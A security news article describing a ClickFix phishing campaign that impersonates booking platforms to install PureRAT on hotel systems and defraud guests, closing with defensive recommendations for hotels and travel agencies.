A new ClickFix phishing campaign is sweeping across the hospitality sector, infecting hotel networks with PureRAT malware. Security researchers have uncovered a large-scale campaign impersonating booking platforms like Booking.com and Expedia to compromise hotel administrators and guests alike.
The operation leverages social engineering and malware-as-a-service tools, aiming to seize access to hotel extranets, harvest credentials, and conduct fraudulent financial activities.
How the ClickFix Phishing Attacks Work
The campaign begins with targeted phishing emails sent to hotel staff, disguised as urgent communications from trusted travel platforms. These messages often warn of “payment issues” or “reservation disputes,” prompting recipients to follow links that lead to ClickFix pages.
These deceptive pages instruct users to “fix the problem” by copying and executing specific code or downloading a “security patch.” In reality, the commands install PureRAT, a remote access trojan capable of full system control, credential theft, and persistence.
ClickFix attacks rely heavily on psychological pressure and credibility. By posing as legitimate customer service threads, they convince hotel employees to execute malicious actions themselves—bypassing most email or antivirus safeguards.
Inside the PureRAT Payload
PureRAT is a modular remote-access trojan associated with the “Pure” malware ecosystem. It gives attackers complete control of infected systems, allowing them to steal credentials, exfiltrate data, and deliver additional payloads.
Recent versions include new obfuscation methods such as DLL sideloading, Python-based loaders, and crypters like Ghost Crypt. These techniques make detection difficult and enable sustained access within hotel IT environments.
Once attackers gain credentials, they exploit legitimate hotel inboxes to target guests directly. Victims receive emails from real hotel addresses claiming they “paid twice” or need to “verify their booking,” leading to further card theft or duplicate charges.
Global Targeting of the Hospitality Sector
According to reports from Sekoia and Microsoft, ClickFix campaigns have been active since late 2024 and continue into 2025. Attackers primarily target hotel administrators, property managers, and third-party booking agents across Europe, North America, and Asia.
Cybercriminals even purchase stolen Booking.com, Expedia, and Airbnb credentials on Telegram channels and underground markets. These stolen accounts allow them to blend seamlessly into legitimate hotel operations, making detection nearly impossible.
Defensive Measures for Hotels and OTAs
Security experts advise hotels and online travel agencies to tighten authentication and staff awareness. Recommended steps include:
- Enabling phishing-resistant MFA (e.g., FIDO2 keys) on all booking and OTA accounts.
- Training staff to identify ClickFix-style lures, such as urgent “fix now” messages or video-guided instructions.
- Monitoring for conversation hijacking within email threads involving guests.
- Deploying EDR tools that detect command-line abuse, sideloading, and PureRAT behavior.
- Revoking compromised cookies and tokens frequently traded on dark markets.
Preventing these attacks requires a mix of technical controls and continuous employee vigilance, as most infections begin with human error.
Final Thoughts
The latest ClickFix phishing campaign reveals how social engineering, automation, and remote-access tools are converging into one of the most effective cybercrime models targeting the hotel industry. By exploiting trust in major booking platforms, criminals infiltrate both business and guest systems with alarming precision.
Hotels must reinforce their digital defenses, authenticate every booking channel, and invest in proactive threat detection to counter this evolving menace.
